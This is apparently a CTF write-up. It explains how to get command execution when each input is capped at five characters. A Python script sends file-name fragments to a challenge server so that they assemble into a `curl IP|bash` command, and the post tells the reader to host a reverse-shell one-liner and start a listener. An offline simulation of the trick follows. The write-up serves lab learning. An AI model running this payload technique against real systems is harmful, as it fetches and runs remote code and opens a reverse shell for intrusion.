Thoughts on a CTF command execution challenge
2022-08-03 01:03:00 【wespten】
This CTF challenge has a command execution vulnerability, but each single input must not exceed 5 characters.

The approach is to use Linux shell features to write out a reverse shell command piece by piece and then execute it.
There are several ways to get the shell back this way; the one used here is `curl ip|bash`.
```python
import requests
from time import sleep
from urllib.parse import quote

# Each entry is sent as one request; every command is at most 5 characters.
# Backslashes are written as Python escapes so the strings are valid.
payload = [
    # generate `ls -t>g` file
    '>ls\\',
    'ls>_',
    '>\\ \\',
    '>-t\\',
    '>\\>g',
    'ls>>_',

    # generate `curl orange.tw.tw|python`
    # generate `curl 10.188.2.20|bash`
    '>sh\\ ',
    '>ba\\',
    '>\\|\\',
    # '>03\\',
    # '>90\\',
    '>0\\',
    '>20\\',
    '>1.\\',
    '>12\\',
    '>7.\\',
    '>10\\',
    '>9.\\',
    '>3\\',
    '>\\ \\',
    '>rl\\',
    '>cu\\',

    # exec
    'sh _',
    'sh g',
]

# reset the challenge environment, then send the fragments one by one
r = requests.get('http://120.79.33.253:9003/?reset=1')
for i in payload:
    assert len(i) <= 5
    r = requests.get('http://120.79.33.253:9003/?cmd=' + quote(i))
    print(i)
    sleep(0.2)  # keep the file timestamps in order for `ls -t`
```

Put a bash reverse shell one-liner on your own server and fetch it with `curl ip|bash`.
Start a listener first; once the final command runs, the shell connects back.

The Linux file-writing trick works as follows:

`ls -t` lists file names newest first, so `ls -t>g` writes the names, in reverse creation order, into `g`. `sh _` runs the file `_`, which contains that `ls -t>g` command, and so produces `g`.

The resulting file contains the characters of `curl xx.x.x.x|bash`, one fragment per line. In the shell, a line ending in `\` is continued on the next line, so fragments ending with `\` are glued into one command; a line without a trailing `\` ends the command. Lines that fail (stray file names such as `_` and `g`) only produce errors; sh keeps executing the remaining lines, so the `curl` line still runs.
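To make the mechanism concrete, here is an added offline simulation (not the post's code) that replays the post's fragment list: it unquotes each `>name` the way the shell does, reproduces the newest-first order of `ls -t>g`, and joins backslash-continued lines as sh does. It assumes every write lands with a distinct timestamp (which is what the `sleep` is for) and executes nothing.

```python
# Added example, not the original post's code: an offline simulation of the
# file-name trick above. It unquotes each `>name` fragment as the shell does,
# reproduces the newest-first order `ls -t>g` writes, and joins backslash-
# continued lines as sh does when it reads `g`. Nothing is executed.

# The post's 5-character commands (backslashes as Python escapes), no HTTP.
PAYLOAD = [
    '>ls\\', 'ls>_', '>\\ \\', '>-t\\', '>\\>g', 'ls>>_',          # ls -t>g
    '>sh\\ ', '>ba\\', '>\\|\\', '>0\\', '>20\\', '>1.\\', '>12\\',
    '>7.\\', '>10\\', '>9.\\', '>3\\', '>\\ \\', '>rl\\', '>cu\\',  # curl line
    'sh _', 'sh g',
]


def unquote(word):
    """Shell backslash removal: a backslash quotes the next character; a
    backslash at the very end of the input has nothing to quote and stays."""
    out, i = [], 0
    while i < len(word):
        if word[i] == '\\' and i + 1 < len(word):
            out.append(word[i + 1])
            i += 2
        else:
            out.append(word[i])
            i += 1
    return ''.join(out)


def assemble(cmds):
    """Replay the commands; return the lines sh executes from the file `g`."""
    created = []  # names, oldest first; rewriting a file moves it to the end

    def touch(name):
        if name in created:
            created.remove(name)
        created.append(name)

    lines = []
    for cmd in cmds:
        if cmd.startswith('>'):
            touch(unquote(cmd[1:]))
        elif cmd in ('ls>_', 'ls>>_'):
            touch('_')
        elif cmd == 'sh _':  # `_` holds `ls -t>g`: the redirection creates g
            touch('g')       # first, then ls lists every name newest-first
            listing = '\n'.join(reversed(created)) + '\n'
            # sh removes each backslash-newline pair, gluing the fragments
            lines = listing.replace('\\\n', '').splitlines()
    return lines
```

`assemble(PAYLOAD)` returns five lines: `g`, the glued `curl ...|bash` line, `_`, `>g` and `-tls`; only the curl line does anything, the others fail harmlessly, which is exactly why the trick tolerates the junk names.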